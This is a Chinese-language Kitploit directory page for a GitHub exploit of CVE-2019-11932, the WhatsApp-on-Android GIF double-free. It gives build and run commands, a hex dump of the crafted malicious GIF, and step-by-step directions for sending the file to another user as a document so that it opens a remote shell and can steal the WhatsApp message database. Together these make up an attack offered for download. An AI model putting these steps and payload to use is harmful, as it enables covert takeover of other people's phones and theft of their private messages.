Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-11932 — 通过Gif利用端口制作漏洞来黑客WhatsApp的程序。 | Kitploit
工具/GitHubGitHub/fastmo/cve-2019-11932
Android安全Payload生成漏洞分析漏洞利用移动安全远程访问工具二进制利用
GitHubfastmo/cve-2019-11932

CVE-2019-11932

通过Gif利用端口制作漏洞来黑客WhatsApp的程序。

查看仓库
171136年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-11932

系统地址()和gadget必须替换为通过信息泄露漏洞找到的实际地址。

在替换系统地址()和gadget之后,运行代码以生成恶意GIF文件:

root@kitploit:~
notroot@osboxes:~/Desktop/gif$ make
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 01 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

然后复制exploit.gif文件,并通过WhatsApp作为文档发送给另一个WhatsApp用户。注意不要作为多媒体文件发送,否则WhatsApp会在发送前尝试将其转换为MP4。一旦用户收到恶意GIF文件,在用户打开WhatsApp相册向朋友发送多媒体文件之前,什么都不会发生。

#指令

WhatsApp GIF攻击向量(小新闻和最后的指令)

root@kitploit:~
                              -----小新闻和指令----

WhatsApp GIF攻击可以通过两种方式执行

本地提权阶段(从用户应用到WhatsApp):在Android设备上安装恶意应用。该应用收集zygote库地址并创建恶意GIF文件,导致在WhatsApp中执行代码。这使得恶意软件能够从WhatsApp沙盒中窃取文件,包括消息数据库。

远程代码执行:与一个存在远程内存信息泄露漏洞的应用配合。攻击者可以收集zygote库地址并创建恶意GIF文件,通过WhatsApp发送给用户(必须作为附件,而不是通过相册选择器作为图片发送,因为WhatsApp会尝试将多媒体文件转换为MP4,这会使你的恶意GIF失效)。一旦用户在WhatsApp中打开相册视图,GIF文件将在WhatsApp上下文中触发远程shell。

必读:你从未知道的4个Fitbit黑客技巧

最新Android上的WhatsApp是可被黑客攻击的

Android 8.1和9.0版本是可利用的,而较早版本则不能。研究人员表示,双重释放错误在较早的操作系统版本上仍可能被触发,但在恶意代码执行RCE之前会发生崩溃。

黑客WhatsApp的恶意GIF

结论: Facebook承认了该安全问题,并在WhatsApp 2.19.244版本中修复了该问题。尽管Facebook试图让这看起来不是一个重大漏洞,但实际上相当令人不悦。一如既往,请保持应用程序更新,不要安装不必要的应用。

--------------------------------------------------------步骤---------------------------------------------------------------------------

只需编译此仓库中的代码。系统地址()和gadget必须替换为实际地址,该地址需要通过信息泄露漏洞自行发现(使用其他技术),之后GIF才能为您实现任何RCE。一旦您编译了上述链接中提到的代码,将内容复制到GIF文件中,并通过WhatsApp作为文档发送给另一个WhatsApp用户。记住不要作为多媒体文件发送,否则WhatsApp会在发送前尝试将其转换为MP4。一旦用户收到恶意GIF文件,在用户打开WhatsApp相册向朋友发送多媒体文件之前,什么都不会发生。

下载工具